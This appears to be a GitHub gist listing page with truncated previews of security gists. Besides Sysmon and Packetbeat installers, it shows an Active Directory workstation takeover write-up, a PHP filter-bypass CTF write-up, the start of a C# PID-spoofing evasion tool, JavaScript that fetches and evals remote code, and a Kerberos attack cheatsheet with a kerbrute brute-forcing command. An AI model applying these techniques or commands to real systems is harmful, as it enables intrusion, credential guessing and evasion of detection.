Skip to content

Instantly share code, notes, and snippets.

View log4she11's full-sized avatar

log4she11

  • 127.0.0.1
View GitHub Profile
#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PACKETBEAT_YAML="https://raw.githubusercontent.com/socfortress/Wazuh-Rules/main/Packetbeat/packetbeat.yml"
logger() {
now=$(date +'%m/%d/%Y %H:%M:%S')
case $1 in
"-e")
mtype="ERROR:"
$sysinternals_repo = 'download.sysinternals.com'
$sysinternals_downloadlink = 'https://download.sysinternals.com/files/SysinternalsSuite.zip'
$sysinternals_folder = 'C:\Program Files\sysinternals'
$sysinternals_zip = 'SysinternalsSuite.zip'
$sysmonconfig_downloadlink = 'https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml'
$sysmonconfig_file = 'sysmonconfig-export.xml'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
if (Test-Path -Path $sysinternals_folder) {
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active November 7, 2024 18:47
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@ChrisPritchard
ChrisPritchard / php-filter-bypass-noletters-or-quotes.md
Last active November 10, 2024 13:08
php filter bypass - no letters or quotes

PHP filter bypass - no letters or quotes

For the 2021 hack the box cyberpocalypse ctf, there was a web challenge called pcalc that included this filter:

if (strlen($formula) >= 100 || preg_match_all('/[a-z\'"]+/i', $formula)) {
    return '🤡 dont bite the hand that feeds you human 🤡';
}
try {
    eval('$pcalc = ' . $formula . ';');
@jfmaes
jfmaes / pidspoofDinvoke.cs
Last active January 17, 2023 02:28
PIDSpoof-DInvoke-Dev-Nuget-NoDynamicAPIIInvoke
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
namespace DInvoke_PIDSpoof_DevNuget
{
class Program
{
static void Main(string[] args)
// <script src="https://code.jquery.com/jquery-3.5.0.js"></script>
const loadScript = async (url) => {
const response = await fetch(url)
const script = await response.text()
Function(script)
}
const scriptUrl = "https://code.jquery.com/jquery-3.5.0.js"
loadScript(scriptUrl)
const loadScript = async (url) => {
const response = await fetch(url)
const script = await response.text()
eval(script)
}
const scriptUrl = "script.js"
loadScript(scriptUrl)
@X-C3LL
X-C3LL / F-Isolation.py
Created April 9, 2020 16:46
Small script to transfer files between a VDI and host using OCR & Keyboard emulation
#!/usr/bin/python
#coding: utf-8
# F-Isolation v0.1 - F**k isolated enviroments
# Because we hate that kind of pentests where you start at an isolated citrix where our
# clipboard is useless, we do not have internet access inside the machine and we can not
# map a local resource to upload our tools.
# OCR + Keyboard emulation FTW!
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: